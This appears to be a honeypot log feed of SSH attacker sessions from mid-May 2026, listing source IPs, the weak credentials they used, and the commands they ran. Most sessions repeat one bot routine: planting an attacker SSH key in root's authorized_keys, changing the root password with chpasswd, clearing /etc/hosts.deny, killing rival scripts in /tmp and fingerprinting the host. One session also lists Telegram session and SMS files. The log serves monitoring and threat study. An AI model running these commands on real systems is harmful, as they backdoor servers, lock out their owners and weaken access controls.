$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_100 (156.240.120.78) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-17 15:10 EDT Β· as root/root123456789
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:MWFXNbsEoINy"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_106 (219.78.63.235) β€” Central, Hong Kong Β· 1 session Β· 9 cmds
2026-05-17 14:29 EDT Β· as root/12345
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 sakura_root_7 (38.207.136.238) β€” Tokyo, Japan Β· 2 sessions Β· 38 cmds
2026-05-17 14:17 EDT Β· as root/password1@, root/valeria
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:x5g2P2fYiP7f"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:XbnOntB3j24E"|chpasswd|bash
🎭 yankee_root_45 (49.51.191.214) β€” Santa Clara, United States Β· 2 sessions Β· 38 cmds
2026-05-17 14:18 EDT Β· as root/password1@, root/valeria
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:H1a8viHiXiET"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:fkIHwZo0rVoT"|chpasswd|bash
🎭 wraith_root_88 (154.221.23.179) β€” Chai Wan, Hong Kong Β· 2 sessions Β· 38 cmds
2026-05-17 14:09 EDT Β· as root/!QAZxsw2#EDCvfr4, root/Server1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:PYkLYFfaqHVV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:DLo42xRYnyAE"|chpasswd|bash
🎭 specter_root_93 (43.156.38.144) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-17 14:10 EDT Β· as root/Server1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ktg9mwi4u6tF"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_34 (111.15.55.241) β€” Jinan, China Β· 1 session Β· 1 cmd
2026-05-17 14:05 EDT Β· as root/cryptolendify321!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 jade_root_24 (124.226.212.169) β€” Liuchow, China Β· 1 session Β· 19 cmds
2026-05-17 13:55 EDT Β· as root/cedric123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:toEDqwhCjqSl"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_87 (27.111.32.174) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-05-17 13:52 EDT Β· as odoo/admin
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin\nqaMWDuSPcVyU\nqaMWDuSPcVyU"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\nqaMWDuSPcVyU\nqaMWDuSPcVyU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_101 (43.156.97.116) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-17 12:31 EDT Β· as root/Pass2023
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:TNJGqr8QeION"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_88 (124.156.195.230) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-17 12:26 EDT Β· as root/traffic
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:84GivJLFmj9r"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_41 (192.169.232.223) β€” Tempe, United States Β· 3 sessions Β· 57 cmds
2026-05-17 11:46 EDT Β· as root/asf, root/ftpaccess, root/victoria123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:uk10TuZTIcqu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:B6IFEi2ID7ZS"|chpasswd|bash
$ echo "root:ImXVP4SvAEUT"|chpasswd|bash
🎭 shadow_root_85 (43.134.174.106) β€” Singapore, Singapore Β· 3 sessions Β· 57 cmds
2026-05-17 11:47 EDT Β· as root/asf, root/ftpaccess, root/victoria123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:YCSbDaxuSeUs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:7Xmwv4JyT2e6"|chpasswd|bash
$ echo "root:6KnTmm0lDSpU"|chpasswd|bash
🎭 cipher_root_89 (43.134.102.13) β€” Singapore, Singapore Β· 3 sessions Β· 57 cmds
2026-05-17 11:47 EDT Β· as root/asf, root/ftpaccess, root/victoria123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:CZnuzElnsiIO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:WTNXMKil9e9j"|chpasswd|bash
$ echo "root:VBTBLaeIBLfa"|chpasswd|bash
🎭 jade_root_25 (14.103.111.167) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-17 11:53 EDT Β· as root/xsw21qaz
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ubsK4JQgu2NL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
